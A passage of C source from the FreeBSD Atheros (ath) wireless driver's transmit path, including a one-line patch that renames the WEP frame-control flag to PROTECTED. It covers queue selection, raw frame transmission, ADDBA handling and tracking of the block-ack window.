& IEEE80211_FC0_TYPE_MASK, __func__); /* XXX statistic */ /* XXX free tx dmamap */ ath_freetx(m0); return EIO; } /* * There are two known scenarios where the frame AC doesn't match * what the destination TXQ is. * * + non-QoS frames (eg management?) that the net80211 stack has * assigned a higher AC to, but since it's a non-QoS TID, it's * being thrown into TID 16. TID 16 gets the AC_BE queue. * It's quite possible that management frames should just be * direct dispatched to hardware rather than go via the software * queue; that should be investigated in the future. There are * some specific scenarios where this doesn't make sense, mostly * surrounding ADDBA request/response - hence why that is special * cased. * * + Multicast frames going into the VAP mcast queue. That shows up * as "TXQ 11". * * This driver should eventually support separate TID and TXQ locking, * allowing for arbitrary AC frames to appear on arbitrary software * queues, being queued to the "correct" hardware queue when needed. */ #if 0 if (txq != sc->sc_ac2q[pri]) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: txq=%p (%d), pri=%d, pri txq=%p (%d)\n", __func__, txq, txq->axq_qnum, pri, sc->sc_ac2q[pri], sc->sc_ac2q[pri]->axq_qnum); } #endif /* * Calculate miscellaneous flags. */ if (ismcast) { flags |= HAL_TXDESC_NOACK; /* no ack on broad/multicast */ } else if (pktlen > vap->iv_rtsthreshold && (ni->ni_ath_flags & IEEE80211_NODE_FF) == 0) { flags |= HAL_TXDESC_RTSENA; /* RTS based on frame length */ sc->sc_stats.ast_tx_rts++; } if (flags & HAL_TXDESC_NOACK) /* NB: avoid double counting */ sc->sc_stats.ast_tx_noack++; #ifdef IEEE80211_SUPPORT_TDMA if (sc->sc_tdma && (flags & HAL_TXDESC_NOACK) == 0) { DPRINTF(sc, ATH_DEBUG_TDMA, "%s: discard frame, ACK required w/ TDMA\n", __func__); sc->sc_stats.ast_tdma_ack++; /* XXX free tx dmamap */ ath_freetx(m0); return EIO; } #endif /* * Determine if a tx interrupt should be generated for * this descriptor. We take a tx interrupt to reap * descriptors when the h/w hits an EOL condition or * when the descriptor is specifically marked to generate * an interrupt. We periodically mark descriptors in this * way to insure timely replenishing of the supply needed * for sending frames. Defering interrupts reduces system * load and potentially allows more concurrent work to be * done but if done to aggressively can cause senders to * backup. * * NB: use >= to deal with sc_txintrperiod changing * dynamically through sysctl. */ if (flags & HAL_TXDESC_INTREQ) { txq->axq_intrcnt = 0; } else if (++txq->axq_intrcnt >= sc->sc_txintrperiod) { flags |= HAL_TXDESC_INTREQ; txq->axq_intrcnt = 0; } /* This point forward is actual TX bits */ /* * At this point we are committed to sending the frame * and we don't need to look at m_nextpkt; clear it in * case this frame is part of frag chain. */ m0->m_nextpkt = NULL; if (IFF_DUMPPKTS(sc, ATH_DEBUG_XMIT)) ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *), m0->m_len, sc->sc_hwmap[rix].ieeerate, -1); if (ieee80211_radiotap_active_vap(vap)) { u_int64_t tsf = ath_hal_gettsf64(ah); sc->sc_tx_th.wt_tsf = htole64(tsf); sc->sc_tx_th.wt_flags = sc->sc_hwmap[rix].txflags; if (iswep) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; if (isfrag) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_FRAG; sc->sc_tx_th.wt_rate = sc->sc_hwmap[rix].ieeerate; sc->sc_tx_th.wt_txpower = ieee80211_get_node_txpower(ni); sc->sc_tx_th.wt_antenna = sc->sc_txantenna; ieee80211_radiotap_tx(vap, m0); } /* Blank the legacy rate array */ bzero(&bf->bf_state.bfs_rc, sizeof(bf->bf_state.bfs_rc)); /* * ath_buf_set_rate needs at least one rate/try to setup * the rate scenario. */ bf->bf_state.bfs_rc[0].rix = rix; bf->bf_state.bfs_rc[0].tries = try0; bf->bf_state.bfs_rc[0].ratecode = txrate; /* Store the decided rate index values away */ bf->bf_state.bfs_pktlen = pktlen; bf->bf_state.bfs_hdrlen = hdrlen; bf->bf_state.bfs_atype = atype; bf->bf_state.bfs_txpower = ieee80211_get_node_txpower(ni); bf->bf_state.bfs_txrate0 = txrate; bf->bf_state.bfs_try0 = try0; bf->bf_state.bfs_keyix = keyix; bf->bf_state.bfs_txantenna = sc->sc_txantenna; bf->bf_state.bfs_txflags = flags; bf->bf_state.bfs_shpream = shortPreamble; /* XXX this should be done in ath_tx_setrate() */ bf->bf_state.bfs_ctsrate0 = 0; /* ie, no hard-coded ctsrate */ bf->bf_state.bfs_ctsrate = 0; /* calculated later */ bf->bf_state.bfs_ctsduration = 0; bf->bf_state.bfs_ismrr = ismrr; return 0; } /* * Queue a frame to the hardware or software queue. * * This can be called by the net80211 code. * * XXX what about locking? Or, push the seqno assign into the * XXX aggregate scheduler so its serialised? * * XXX When sending management frames via ath_raw_xmit(), * should CLRDMASK be set unconditionally? */ int ath_tx_start(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0) { struct ieee80211vap *vap = ni->ni_vap; struct ath_vap *avp = ATH_VAP(vap); int r = 0; u_int pri; int tid; struct ath_txq *txq; int ismcast; const struct ieee80211_frame *wh; int is_ampdu, is_ampdu_tx, is_ampdu_pending; ieee80211_seq seqno; uint8_t type, subtype; int queue_to_head; ATH_TX_LOCK_ASSERT(sc); /* * Determine the target hardware queue. * * For multicast frames, the txq gets overridden appropriately * depending upon the state of PS. * * For any other frame, we do a TID/QoS lookup inside the frame * to see what the TID should be. If it's a non-QoS frame, the * AC and TID are overridden. The TID/TXQ code assumes the * TID is on a predictable hardware TXQ, so we don't support * having a node TID queued to multiple hardware TXQs. * This may change in the future but would require some locking * fudgery. */ pri = ath_tx_getac(sc, m0); tid = ath_tx_gettid(sc, m0); txq = sc->sc_ac2q[pri]; wh = mtod(m0, struct ieee80211_frame *); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* * Enforce how deep the multicast queue can grow. * * XXX duplicated in ath_raw_xmit(). */ if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { if (sc->sc_cabq->axq_depth + sc->sc_cabq->fifo.axq_depth > sc->sc_txq_mcastq_maxdepth) { sc->sc_stats.ast_tx_mcastq_overflow++; m_freem(m0); return (ENOBUFS); } } /* * Enforce how deep the unicast queue can grow. * * If the node is in power save then we don't want * the software queue to grow too deep, or a node may * end up consuming all of the ath_buf entries. * * For now, only do this for DATA frames. * * We will want to cap how many management/control * frames get punted to the software queue so it doesn't * fill up. But the correct solution isn't yet obvious. * In any case, this check should at least let frames pass * that we are direct-dispatching. * * XXX TODO: duplicate this to the raw xmit path! */ if (type == IEEE80211_FC0_TYPE_DATA && ATH_NODE(ni)->an_is_powersave && ATH_NODE(ni)->an_swq_depth > sc->sc_txq_node_psq_maxdepth) { sc->sc_stats.ast_tx_node_psq_overflow++; m_freem(m0); return (ENOBUFS); } /* A-MPDU TX */ is_ampdu_tx = ath_tx_ampdu_running(sc, ATH_NODE(ni), tid); is_ampdu_pending = ath_tx_ampdu_pending(sc, ATH_NODE(ni), tid); is_ampdu = is_ampdu_tx | is_ampdu_pending; DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d, ac=%d, is_ampdu=%d\n", __func__, tid, pri, is_ampdu); /* Set local packet state, used to queue packets to hardware */ bf->bf_state.bfs_tid = tid; bf->bf_state.bfs_tx_queue = txq->axq_qnum; bf->bf_state.bfs_pri = pri; #if 1 /* * When servicing one or more stations in power-save mode * (or) if there is some mcast data waiting on the mcast * queue (to prevent out of order delivery) multicast frames * must be bufferd until after the beacon. * * TODO: we should lock the mcastq before we check the length. */ if (sc->sc_cabq_enable && ismcast && (vap->iv_ps_sta || avp->av_mcastq.axq_depth)) { txq = &avp->av_mcastq; /* * Mark the frame as eventually belonging on the CAB * queue, so the descriptor setup functions will * correctly initialise the descriptor 'qcuId' field. */ bf->bf_state.bfs_tx_queue = sc->sc_cabq->axq_qnum; } #endif /* Do the generic frame setup */ /* XXX should just bzero the bf_state? */ bf->bf_state.bfs_dobaw = 0; /* A-MPDU TX? Manually set sequence number */ /* * Don't do it whilst pending; the net80211 layer still * assigns them. */ if (is_ampdu_tx) { /* * Always call; this function will * handle making sure that null data frames * don't get a sequence number from the current * TID and thus mess with the BAW. */ seqno = ath_tx_tid_seqno_assign(sc, ni, bf, m0); /* * Don't add QoS NULL frames to the BAW. */ if (IEEE80211_QOS_HAS_SEQ(wh) && subtype != IEEE80211_FC0_SUBTYPE_QOS_NULL) { bf->bf_state.bfs_dobaw = 1; } } /* * If needed, the sequence number has been assigned. * Squirrel it away somewhere easy to get to. */ bf->bf_state.bfs_seqno = M_SEQNO_GET(m0) << IEEE80211_SEQ_SEQ_SHIFT; /* Is ampdu pending? fetch the seqno and print it out */ if (is_ampdu_pending) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid %d: ampdu pending, seqno %d\n", __func__, tid, M_SEQNO_GET(m0)); /* This also sets up the DMA map */ r = ath_tx_normal_setup(sc, ni, bf, m0, txq); if (r != 0) goto done; /* At this point m0 could have changed! */ m0 = bf->bf_m; #if 1 /* * If it's a multicast frame, do a direct-dispatch to the * destination hardware queue. Don't bother software * queuing it. */ /* * If it's a BAR frame, do a direct dispatch to the * destination hardware queue. Don't bother software * queuing it, as the TID will now be paused. * Sending a BAR frame can occur from the net80211 txa timer * (ie, retries) or from the ath txtask (completion call.) * It queues directly to hardware because the TID is paused * at this point (and won't be unpaused until the BAR has * either been TXed successfully or max retries has been * reached.) */ /* * Until things are better debugged - if this node is asleep * and we're sending it a non-BAR frame, direct dispatch it. * Why? Because we need to figure out what's actually being * sent - eg, during reassociation/reauthentication after * the node (last) disappeared whilst asleep, the driver should * have unpaused/unsleep'ed the node. So until that is * sorted out, use this workaround. */ if (txq == &avp->av_mcastq) { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bf=%p: mcastq: TX'ing\n", __func__, bf); bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; ath_tx_xmit_normal(sc, txq, bf); } else if (ath_tx_should_swq_frame(sc, ATH_NODE(ni), m0, &queue_to_head)) { ath_tx_swq(sc, ni, txq, queue_to_head, bf); } else { bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; ath_tx_xmit_normal(sc, txq, bf); } #else /* * For now, since there's no software queue, * direct-dispatch to the hardware. */ bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, tid, bf); ath_tx_xmit_normal(sc, txq, bf); #endif done: return 0; } static int ath_tx_raw_start(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ath_hal *ah = sc->sc_ah; struct ieee80211vap *vap = ni->ni_vap; int error, ismcast, ismrr; int keyix, hdrlen, pktlen, try0, txantenna; u_int8_t rix, txrate; struct ieee80211_frame *wh; u_int flags; HAL_PKT_TYPE atype; const HAL_RATE_TABLE *rt; struct ath_desc *ds; u_int pri; int o_tid = -1; int do_override; uint8_t type, subtype; int queue_to_head; ATH_TX_LOCK_ASSERT(sc); wh = mtod(m0, struct ieee80211_frame *); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); hdrlen = ieee80211_anyhdrsize(wh); /* * Packet length must not include any * pad bytes; deduct them here. */ /* XXX honor IEEE80211_BPF_DATAPAD */ pktlen = m0->m_pkthdr.len - (hdrlen & 3) + IEEE80211_CRC_LEN; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; ATH_KTR(sc, ATH_KTR_TX, 2, "ath_tx_raw_start: ni=%p, bf=%p, raw", ni, bf); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: ismcast=%d\n", __func__, ismcast); pri = params->ibp_pri & 3; /* Override pri if the frame isn't a QoS one */ if (! IEEE80211_QOS_HAS_SEQ(wh)) pri = ath_tx_getac(sc, m0); /* XXX If it's an ADDBA, override the correct queue */ do_override = ath_tx_action_frame_override_queue(sc, ni, m0, &o_tid); /* Map ADDBA to the correct priority */ if (do_override) { #if 0 DPRINTF(sc, ATH_DEBUG_XMIT, "%s: overriding tid %d pri %d -> %d\n", __func__, o_tid, pri, TID_TO_WME_AC(o_tid)); #endif pri = TID_TO_WME_AC(o_tid); } /* Handle encryption twiddling if needed */ if (! ath_tx_tag_crypto(sc, ni, m0, params->ibp_flags & IEEE80211_BPF_CRYPTO, 0, &hdrlen, &pktlen, &keyix)) { ath_freetx(m0); return EIO; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); /* Do the generic frame setup */ /* XXX should just bzero the bf_state? */ bf->bf_state.bfs_dobaw = 0; error = ath_tx_dmasetup(sc, bf, m0); if (error != 0) return error; m0 = bf->bf_m; /* NB: may have changed */ wh = mtod(m0, struct ieee80211_frame *); bf->bf_node = ni; /* NB: held reference */ /* Always enable CLRDMASK for raw frames for now.. */ flags = HAL_TXDESC_CLRDMASK; /* XXX needed for crypto errs */ flags |= HAL_TXDESC_INTREQ; /* force interrupt */ if (params->ibp_flags & IEEE80211_BPF_RTS) flags |= HAL_TXDESC_RTSENA; else if (params->ibp_flags & IEEE80211_BPF_CTS) { /* XXX assume 11g/11n protection? */ bf->bf_state.bfs_doprot = 1; flags |= HAL_TXDESC_CTSENA; } /* XXX leave ismcast to injector? */ if ((params->ibp_flags & IEEE80211_BPF_NOACK) || ismcast) flags |= HAL_TXDESC_NOACK; rt = sc->sc_currates; KASSERT(rt != NULL, ("no rate table, mode %u", sc->sc_curmode)); rix = ath_tx_findrix(sc, params->ibp_rate0); txrate = rt->info[rix].rateCode; if (params->ibp_flags & IEEE80211_BPF_SHORTPRE) txrate |= rt->info[rix].shortPreamble; sc->sc_txrix = rix; try0 = params->ibp_try0; ismrr = (params->ibp_try1 != 0); txantenna = params->ibp_pri >> 2; if (txantenna == 0) /* XXX? */ txantenna = sc->sc_txantenna; /* * Since ctsrate is fixed, store it away for later * use when the descriptor fields are being set. */ if (flags & (HAL_TXDESC_RTSENA|HAL_TXDESC_CTSENA)) bf->bf_state.bfs_ctsrate0 = params->ibp_ctsrate; /* * NB: we mark all packets as type PSPOLL so the h/w won't * set the sequence number, duration, etc. */ atype = HAL_PKT_TYPE_PSPOLL; if (IFF_DUMPPKTS(sc, ATH_DEBUG_XMIT)) ieee80211_dump_pkt(ic, mtod(m0, caddr_t), m0->m_len, sc->sc_hwmap[rix].ieeerate, -1); if (ieee80211_radiotap_active_vap(vap)) { u_int64_t tsf = ath_hal_gettsf64(ah); sc->sc_tx_th.wt_tsf = htole64(tsf); sc->sc_tx_th.wt_flags = sc->sc_hwmap[rix].txflags; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; if (m0->m_flags & M_FRAG) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_FRAG; sc->sc_tx_th.wt_rate = sc->sc_hwmap[rix].ieeerate; sc->sc_tx_th.wt_txpower = MIN(params->ibp_power, ieee80211_get_node_txpower(ni)); sc->sc_tx_th.wt_antenna = sc->sc_txantenna; ieee80211_radiotap_tx(vap, m0); } /* * Formulate first tx descriptor with tx controls. */ ds = bf->bf_desc; /* XXX check return value? */ /* Store the decided rate index values away */ bf->bf_state.bfs_pktlen = pktlen; bf->bf_state.bfs_hdrlen = hdrlen; bf->bf_state.bfs_atype = atype; bf->bf_state.bfs_txpower = MIN(params->ibp_power, ieee80211_get_node_txpower(ni)); bf->bf_state.bfs_txrate0 = txrate; bf->bf_state.bfs_try0 = try0; bf->bf_state.bfs_keyix = keyix; bf->bf_state.bfs_txantenna = txantenna; bf->bf_state.bfs_txflags = flags; bf->bf_state.bfs_shpream = !! (params->ibp_flags & IEEE80211_BPF_SHORTPRE); /* Set local packet state, used to queue packets to hardware */ bf->bf_state.bfs_tid = WME_AC_TO_TID(pri); bf->bf_state.bfs_tx_queue = sc->sc_ac2q[pri]->axq_qnum; bf->bf_state.bfs_pri = pri; /* XXX this should be done in ath_tx_setrate() */ bf->bf_state.bfs_ctsrate = 0; bf->bf_state.bfs_ctsduration = 0; bf->bf_state.bfs_ismrr = ismrr; /* Blank the legacy rate array */ bzero(&bf->bf_state.bfs_rc, sizeof(bf->bf_state.bfs_rc)); bf->bf_state.bfs_rc[0].rix = ath_tx_findrix(sc, params->ibp_rate0); bf->bf_state.bfs_rc[0].tries = try0; bf->bf_state.bfs_rc[0].ratecode = txrate; if (ismrr) { int rix; rix = ath_tx_findrix(sc, params->ibp_rate1); bf->bf_state.bfs_rc[1].rix = rix; bf->bf_state.bfs_rc[1].tries = params->ibp_try1; rix = ath_tx_findrix(sc, params->ibp_rate2); bf->bf_state.bfs_rc[2].rix = rix; bf->bf_state.bfs_rc[2].tries = params->ibp_try2; rix = ath_tx_findrix(sc, params->ibp_rate3); bf->bf_state.bfs_rc[3].rix = rix; bf->bf_state.bfs_rc[3].tries = params->ibp_try3; } /* * All the required rate control decisions have been made; * fill in the rc flags. */ ath_tx_rate_fill_rcflags(sc, bf); /* NB: no buffered multicast in power save support */ /* * If we're overiding the ADDBA destination, dump directly * into the hardware queue, right after any pending * frames to that node are. */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: dooverride=%d\n", __func__, do_override); #if 1 /* * Put addba frames in the right place in the right TID/HWQ. */ if (do_override) { bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* * XXX if it's addba frames, should we be leaking * them out via the frame leak method? * XXX for now let's not risk it; but we may wish * to investigate this later. */ ath_tx_xmit_normal(sc, sc->sc_ac2q[pri], bf); } else if (ath_tx_should_swq_frame(sc, ATH_NODE(ni), m0, &queue_to_head)) { /* Queue to software queue */ ath_tx_swq(sc, ni, sc->sc_ac2q[pri], queue_to_head, bf); } else { bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; ath_tx_xmit_normal(sc, sc->sc_ac2q[pri], bf); } #else /* Direct-dispatch to the hardware */ bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, tid, bf); ath_tx_xmit_normal(sc, sc->sc_ac2q[pri], bf); #endif return 0; } /* * Send a raw frame. * * This can be called by net80211. */ int ath_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct ath_softc *sc = ifp->if_softc; struct ath_buf *bf; struct ieee80211_frame *wh = mtod(m, struct ieee80211_frame *); int error = 0; ATH_PCU_LOCK(sc); if (sc->sc_inreset_cnt > 0) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: sc_inreset_cnt > 0; bailing\n", __func__); error = EIO; ATH_PCU_UNLOCK(sc); goto bad0; } sc->sc_txstart_cnt++; ATH_PCU_UNLOCK(sc); ATH_TX_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->sc_invalid) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: discard frame, %s", __func__, (ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 ? "!running" : "invalid"); m_freem(m); error = ENETDOWN; goto bad; } /* * Enforce how deep the multicast queue can grow. * * XXX duplicated in ath_tx_start(). */ if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { if (sc->sc_cabq->axq_depth + sc->sc_cabq->fifo.axq_depth > sc->sc_txq_mcastq_maxdepth) { sc->sc_stats.ast_tx_mcastq_overflow++; error = ENOBUFS; } if (error != 0) { m_freem(m); goto bad; } } /* * Grab a TX buffer and associated resources. */ bf = ath_getbuf(sc, ATH_BUFTYPE_MGMT); if (bf == NULL) { sc->sc_stats.ast_tx_nobuf++; m_freem(m); error = ENOBUFS; goto bad; } ATH_KTR(sc, ATH_KTR_TX, 3, "ath_raw_xmit: m=%p, params=%p, bf=%p\n", m, params, bf); if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ if (ath_tx_start(sc, ni, bf, m)) { error = EIO; /* XXX */ goto bad2; } } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ if (ath_tx_raw_start(sc, ni, bf, m, params)) { error = EIO; /* XXX */ goto bad2; } } sc->sc_wd_timer = 5; ifp->if_opackets++; sc->sc_stats.ast_tx_raw++; /* * Update the TIM - if there's anything queued to the * software queue and power save is enabled, we should * set the TIM. */ ath_tx_update_tim(sc, ni, 1); ATH_TX_UNLOCK(sc); ATH_PCU_LOCK(sc); sc->sc_txstart_cnt--; ATH_PCU_UNLOCK(sc); return 0; bad2: ATH_KTR(sc, ATH_KTR_TX, 3, "ath_raw_xmit: bad2: m=%p, params=%p, " "bf=%p", m, params, bf); ATH_TXBUF_LOCK(sc); ath_returnbuf_head(sc, bf); ATH_TXBUF_UNLOCK(sc); bad: ATH_TX_UNLOCK(sc); ATH_PCU_LOCK(sc); sc->sc_txstart_cnt--; ATH_PCU_UNLOCK(sc); bad0: ATH_KTR(sc, ATH_KTR_TX, 2, "ath_raw_xmit: bad0: m=%p, params=%p", m, params); ifp->if_oerrors++; sc->sc_stats.ast_tx_raw_fail++; ieee80211_free_node(ni); return error; } /* Some helper functions */ /* * ADDBA (and potentially others) need to be placed in the same * hardware queue as the TID/node it's relating to. This is so * it goes out after any pending non-aggregate frames to the * same node/TID. * * If this isn't done, the ADDBA can go out before the frames * queued in hardware. Even though these frames have a sequence * number -earlier- than the ADDBA can be transmitted (but * no frames whose sequence numbers are after the ADDBA should * be!) they'll arrive after the ADDBA - and the receiving end * will simply drop them as being out of the BAW. * * The frames can't be appended to the TID software queue - it'll * never be sent out. So these frames have to be directly * dispatched to the hardware, rather than queued in software. * So if this function returns true, the TXQ has to be * overridden and it has to be directly dispatched. * * It's a dirty hack, but someone's gotta do it. */ /* * XXX doesn't belong here! */ static int ieee80211_is_action(struct ieee80211_frame *wh) { /* Type: Management frame? */ if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_MGT) return 0; /* Subtype: Action frame? */ if ((wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) != IEEE80211_FC0_SUBTYPE_ACTION) return 0; return 1; } #define MS(_v, _f) (((_v) & _f) >> _f##_S) /* * Return an alternate TID for ADDBA request frames. * * Yes, this likely should be done in the net80211 layer. */ static int ath_tx_action_frame_override_queue(struct ath_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, int *tid) { struct ieee80211_frame *wh = mtod(m0, struct ieee80211_frame *); struct ieee80211_action_ba_addbarequest *ia; uint8_t *frm; uint16_t baparamset; /* Not action frame? Bail */ if (! ieee80211_is_action(wh)) return 0; /* XXX Not needed for frames we send? */ #if 0 /* Correct length? */ if (! ieee80211_parse_action(ni, m)) return 0; #endif /* Extract out action frame */ frm = (u_int8_t *)&wh[1]; ia = (struct ieee80211_action_ba_addbarequest *) frm; /* Not ADDBA? Bail */ if (ia->rq_header.ia_category != IEEE80211_ACTION_CAT_BA) return 0; if (ia->rq_header.ia_action != IEEE80211_ACTION_BA_ADDBA_REQUEST) return 0; /* Extract TID, return it */ baparamset = le16toh(ia->rq_baparamset); *tid = (int) MS(baparamset, IEEE80211_BAPS_TID); return 1; } #undef MS /* Per-node software queue operations */ /* * Add the current packet to the given BAW. * It is assumed that the current packet * * + fits inside the BAW; * + already has had a sequence number allocated. * * Since the BAW status may be modified by both the ath task and * the net80211/ifnet contexts, the TID must be locked. */ void ath_tx_addto_baw(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, struct ath_buf *bf) { int index, cindex; struct ieee80211_tx_ampdu *tap; ATH_TX_LOCK_ASSERT(sc); if (bf->bf_state.bfs_isretried) return; tap = ath_tx_get_tx_tid(an, tid->tid); if (! bf->bf_state.bfs_dobaw) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: dobaw=0, seqno=%d, window %d:%d\n", __func__, SEQNO(bf->bf_state.bfs_seqno), tap->txa_start, tap->txa_wnd); } if (bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: re-added? tid=%d, seqno %d; window %d:%d; " "baw head=%d tail=%d\n", __func__, tid->tid, SEQNO(bf->bf_state.bfs_seqno), tap->txa_start, tap->txa_wnd, tid->baw_head, tid->baw_tail); /* * Verify that the given sequence number is not outside of the * BAW. Complain loudly if that's the case. */ if (! BAW_WITHIN(tap->txa_start, tap->txa_wnd, SEQNO(bf->bf_state.bfs_seqno))) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: bf=%p: outside of BAW?? tid=%d, seqno %d; window %d:%d; " "baw head=%d tail=%d\n", __func__, bf, tid->tid, SEQNO(bf->bf_state.bfs_seqno), tap->txa_start, tap->txa_wnd, tid->baw_head, tid->baw_tail); } /* * ni->ni_txseqs[] is the currently allocated seqno. * the txa state contains the current baw start. */ index = ATH_BA_INDEX(tap->txa_start, SEQNO(bf->bf_state.bfs_seqno)); cindex = (tid->baw_head + index) & (ATH_TID_MAX_BUFS - 1); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: tid=%d, seqno %d; window %d:%d; index=%d cindex=%d " "baw head=%d tail=%d\n", __func__, tid->tid, SEQNO(bf->bf_state.bfs_seqno), tap->txa_start, tap->txa_wnd, index, cindex, tid->baw_head, tid->baw_tail); #if 0 assert(tid->tx_buf[cindex] == NULL); #endif if (tid->tx_buf[cindex] != NULL) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: ba packet dup (index=%d, cindex=%d, " "head=%d, tail=%d)\n", __func__, index, cindex, tid->baw_head, tid->baw_tail); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: BA bf: %p; seqno=%d ; new bf: %p; seqno=%d\n", __func__, tid->tx_buf[cindex], SEQNO(tid->tx_buf[cindex]->bf_state.bfs_seqno), bf, SEQNO(bf->bf_state.bfs_seqno) ); } tid->tx_buf[cindex] = bf; if (index >= ((tid->baw_tail - tid->baw_head) & (ATH_TID_MAX_BUFS - 1))) { tid->baw_tail = cindex; INCR(tid->baw_tail, ATH_TID_MAX_BUFS); } } /* * Flip the BAW buffer entry over from the existing one to the new one. * * When software retransmitting a (sub-)frame, it is entirely possible that * the frame ath_buf is marked as BUSY and can't be immediately reused. * In that instance the buffer is cloned and the new buffer is used for * retransmit. We thus need to update the ath_buf slot in the BAW buf * tracking array to maintain consistency. */ static void ath_tx_switch_baw_buf(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, struct ath_buf *old_bf, struct ath_buf *new_bf) { int index, cindex; struct ieee80211_tx_ampdu *tap; int seqno = SEQNO(old_bf->bf_state.bfs_seqno); ATH_TX_LOCK_ASSERT(sc); tap = ath_tx_get_tx_tid(an, tid->tid); index = ATH_BA_INDEX(tap->txa_start, seqno); cindex = (tid->baw_head + index) & (ATH_TID_MAX_BUFS - 1); /* * Just warn for now; if it happens then we should find out * about it. It's highly likely the aggregation session will * soon hang. */ if (old_bf->bf_state.bfs_seqno != new_bf->bf_state.bfs_seqno) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: retransmitted buffer" " has mismatching seqno's, BA session may hang.\n", __func__); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: old seqno=%d, new_seqno=%d\n", __func__, old_bf->bf_state.bfs_seqno, new_bf->bf_state.bfs_seqno); } if (tid->tx_buf[cindex] != old_bf) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: ath_buf pointer incorrect; " " has m BA session may hang.\n", __func__); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: old bf=%p, new bf=%p\n", __func__, old_bf, new_bf); } tid->tx_buf[cindex] = new_bf; } /* * seq_start - left edge of BAW * seq_next - current/next sequence number to allocate * * Since the BAW status may be modified by both the ath task and * the net80211/ifnet contexts, the TID must be locked. */ static void ath_tx_update_baw(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, const struct ath_buf *bf) { int index, cindex; struct ieee80211_tx_ampdu *tap; int seqno = SEQNO(bf->bf_state.bfs_seqno); ATH_TX_LOCK_ASSERT(sc); tap = ath_tx_get_tx_tid(an, tid->tid); index = ATH_BA_INDEX(tap->txa_start, seqno); cindex = (tid->baw_head + index) & (ATH_TID_MAX_BUFS - 1); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: tid=%d, baw=%d:%d, seqno=%d, index=%d, cindex=%d, " "baw head=%d, tail=%d\n", __func__, tid->tid, tap->txa_start, tap->txa_wnd, seqno, index, cindex, tid->baw_head, tid->baw_tail); /* * If this occurs then we have a big problem - something else * has slid tap->txa_start along without updating the BAW * tracking start/end pointers. Thus the TX BAW state is now * completely busted. * * But for now, since I haven't yet fixed TDMA and buffer cloning, * it's quite possible that a cloned buffer is making its way * here and causing it to fire off. Disable TDMA for now. */ if (tid->tx_buf[cindex] != bf) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: comp bf=%p, seq=%d; slot bf=%p, seqno=%d\n", __func__, bf, SEQNO(bf->bf_state.bfs_seqno), tid->tx_buf[cindex], (tid->tx_buf[cindex] != NULL) ? SEQNO(tid->tx_buf[cindex]->bf_state.bfs_seqno) : -1); } tid->tx_buf[cindex] = NULL; while (tid->baw_head != tid->baw_tail && !tid->tx_buf[tid->baw_head]) { INCR(tap->txa_start, IEEE80211_SEQ_RANGE); INCR(tid->baw_head, ATH_TID_MAX_BUFS); 